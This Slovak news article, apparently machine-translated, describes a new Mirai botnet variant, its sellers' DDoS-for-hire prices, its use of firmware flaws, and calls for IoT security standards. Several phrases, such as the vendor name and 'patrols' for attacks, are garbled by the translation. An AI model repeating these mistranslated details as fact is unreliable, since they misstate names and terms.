Predtým naši odborníci študovali kód botnetu Mirai - ukázalo sa, že nebol vytvorený špeciálne pre zariadenia internetu vecí. Škodlivý softvér vyhľadáva zariadenia pripojené k sieti s predvolenými prihlasovacími údajmi a heslami (admin:admin, root:password atď.). To znamená, že teoreticky môže zahŕňať akékoľvek zariadenia vrátane domácich počítačov a serverov alebo smerovačov.

IoT zariadenia- zvyčajne smerovače - zahrnuté v Botnet Mirai kým sa nereštartuje - potom sa červ vymaže z ich pamäte. Botnet však neustále prehľadáva internet, či neobsahuje zraniteľné zariadenia, takže „vyliečené“ zariadenie sa môže opäť rýchlo stať jeho súčasťou. Medzi hackermi prebiehajú skutočné preteky v tom, kto ako prvý infikuje čo najviac zariadení.

Chýbajú informácie o tom, ako sa tvorcom nového Mirai darí predbiehať svojich konkurentov. Novinárom však povedali, že používajú svoj vlastný botnet na skenovanie potenciálne zraniteľných zariadení, vrátane tých, ktoré boli predtým súčasťou botnetu.

„Prečo nenechať Mirai loviť Mirai a nezožrať originál,“ hovorí BestBuy.

Nielen Mirai

Nový botnet však nepohltil len staré zariadenia Mirai a nové s predvolenými heslami. Jeho tvorcovia využívajú aj 0-dňové zraniteľnosti vo firmvéri IoT zariadení. Odborníci predtým predpovedali bezprostredný vznik takýchto „kombinovaných“ botnetov.

Boj proti nim sa výrazne skomplikuje - ak používateľ koncového zariadenia potrebuje na to, aby čelil Mirai, iba zmeniť prihlasovacie meno a heslo, aby sa k nemu dostal, nebude sa môcť vyrovnať so zraniteľnosťami modulu gadget sám. .

DDoS rýchlosťou 700 Gbps

Hackeri BestBuy a Popopret začali inzerovať svoje služby – ponúkajú prístup k svojim Nová verzia Mirai, odosielanie spamových správ cez XMPP/Jabber,

Podľa hackera ponúkajú zákazníkom niekoľko balíkov služieb. Lacnejší sa oplatí $2 000 - za tieto peniaze si klienti môžu prenajať od 20 000 až 25 000 uzly botnetu na spustenie hliadok po dobu až dvoch týždňov, s prestávkou pätnásť minút medzi útokmi. vzadu $15 000 alebo $20 000 zákazníci majú teraz možnosť nechať 600 000 robotov spustiť dvojhodinové útoky s 30 alebo 15-minútovými prestávkami. V druhom prípade bude sila útoku 700 Gbit/s alebo viac.

Perspektívy

Bezpečnosť IoT zariadenia je často na dosť nízkej úrovni – vysvetľuje to skutočnosť, že predajcovia často nemajú záujem o implementáciu dodatočných opatrení informačná bezpečnosť. Inzerujú jednoduchosť používania svojich produktov, ale všetky dodatočné bezpečnostné opatrenia ukladajú obmedzenia a vyžadujú zdroje.

Ako je uvedené vyššie, iba vývojári koncových zariadení alebo poskytovatelia, ktorí ich poskytujú (v prípade smerovačov), môžu chrániť používateľov pred pokročilejšími botnetmi. Nemecký poskytovateľ Deutsche Telekom, zasiahnutý útokom novej verzie Mirai, už oznámil, že „prehodnotí obchodné vzťahy“ s dodávateľmi zraniteľných routerov. Speedport, spoločnosť arkádsky.

V konečnom dôsledku bude možné zvýšiť úroveň bezpečnosti internetu vecí zavedením prísnejšej kontroly zariadení zo strany poskytovateľov na jednej strane a vypracovaním štandardov a regulačnej dokumentácie pre internet vecí na strane druhej. . Podobné opatrenia už boli prijaté v mnohých krajinách na zaistenie bezpečnosti automatizovaných systémov riadenia procesov. Prvé kroky v tomto smere už boli podniknuté – napríklad viacerí IT predajcovia zverejnili v septembri dokument tzv Priemyselná internetová bezpečnosť Rámec (IISF)- navrhuje považovať internet vecí za súčasť „priemyselného internetu“.

Problém však ešte zďaleka nie je vyriešený a hackeri BestBuy a Popopret môže získať monopol vo veľkom rozsahu DDoS útoky online. To je dosť smutný fakt, ale samotní hackeri počas rozhovoru s Základná doska vyhlásili, že ich činnosť sa bude riadiť nielen ziskom, ale aj morálnymi zásadami. BestBuy teda povedal, že nedovolí zákazníkom útočiť na IP adresy spoločností pracujúcich s kritickou infraštruktúrou.